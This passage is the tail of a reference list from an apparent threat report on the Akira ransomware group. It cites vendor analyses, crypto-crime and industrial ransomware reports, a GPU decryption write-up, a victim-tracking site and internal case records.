[9]CybelAngel: Akira Ransomware — The Conti Successor Targeting the West (April 2026) — cybelangel.com
[10]Palo Alto Unit 42: Threat Assessment Howling Scorpius (December 2024) — unit42.paloaltonetworks.com
[11]Cisco Talos: Akira Ransomware Continues to Evolve (October 2024) — talosintelligence.com
[12]S-RM Intelligence: Ransomware in Focus: Meet Akira (October 2024) — s-rminform.com
[13]Dragos: Industrial Ransomware Analysis Q1 2025 — dragos.com
[14]Chainalysis: 2025 Crypto Crime Report
[15]Tinyhack: Decrypting Akira Linux/ESXi Variant Using GPUs (March 2025) — tinyhack.com
[16]Arete: Ransomware Trends and Data Insights March 2026 — areteir.com
Victim and Financial Data
[17]Ransomware.live: Akira Group Profile (accessed May 2026) — ransomware.live
[18]Internal data — 85 confirmed case records, 2023 Q2 through 2026 Q1